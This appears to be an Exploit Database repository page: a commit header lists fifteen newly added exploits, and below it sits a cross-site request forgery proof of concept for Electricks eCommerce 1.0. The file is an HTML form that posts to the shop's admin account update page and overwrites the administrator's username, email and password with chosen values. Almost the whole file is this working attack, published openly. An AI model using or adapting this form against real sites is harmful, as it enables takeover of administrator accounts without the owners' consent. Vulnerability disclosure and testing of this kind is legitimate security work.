1d25aee539
15 changes to exploits/shellcodes AMPPS 2.7 - Denial of Service (PoC) Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC) ntpd 4.2.8p10 - Out-of-Bounds Read (PoC) SwitchVPN for macOS 2.1012.03 - Privilege Escalation Atlassian Jira - Authenticated Upload Code Execution (Metasploit) iServiceOnline 1.0 - 'r' SQL Injection Helpdezk 1.1.1 - 'query' SQL Injection Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password) EdTv 2 - 'id' SQL Injection Dell OpenManage Network Manager 6.2.0.51 SP3 - Multiple Vulnerabilities Advanced Comment System 1.0 - SQL Injection Rmedia SMS 1.0 - SQL Injection Pedidos 1.0 - SQL Injection Electricks eCommerce 1.0 - Persistent Cross-Site Scripting DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload
24 lines
No EOL
1.1 KiB
Text
24 lines
No EOL
1.1 KiB
Text
# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)
|
|
# Date: 2018-11-12
|
|
# Exploit Author: Nawaf Alkeraithe
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
|
|
# Version: 1.0
|
|
|
|
#PoC:
|
|
|
|
<html><form enctype="application/x-www-form-urlencoded" method="POST"
|
|
action="
|
|
http://localhost/Electricks/Electricks/Electricks-shop/pages/admin_account_update.php"><table><tr><td>user_id</td><td><input
|
|
type="text" value="4" name="user_id"></td></tr>
|
|
<tr><td>firstname</td><td><input type="text" value="admin"
|
|
name="firstname"></td></tr>
|
|
<tr><td>lastname</td><td><input type="text" value="admin"
|
|
name="lastname"></td></tr>
|
|
<tr><td>email</td><td><input type="text" value="admin@admin.com"
|
|
name="email"></td></tr>
|
|
<tr><td>username</td><td><input type="text" value="admin"
|
|
name="username"></td></tr>
|
|
<tr><td>password</td><td><input type="text" value="NewPass"
|
|
name="password"></td></tr>
|
|
<tr><td>update</td><td><input type="text" value="" name="update"></td></tr>
|
|
</table><input type="submit" value="Change Admin Password"></form></html> |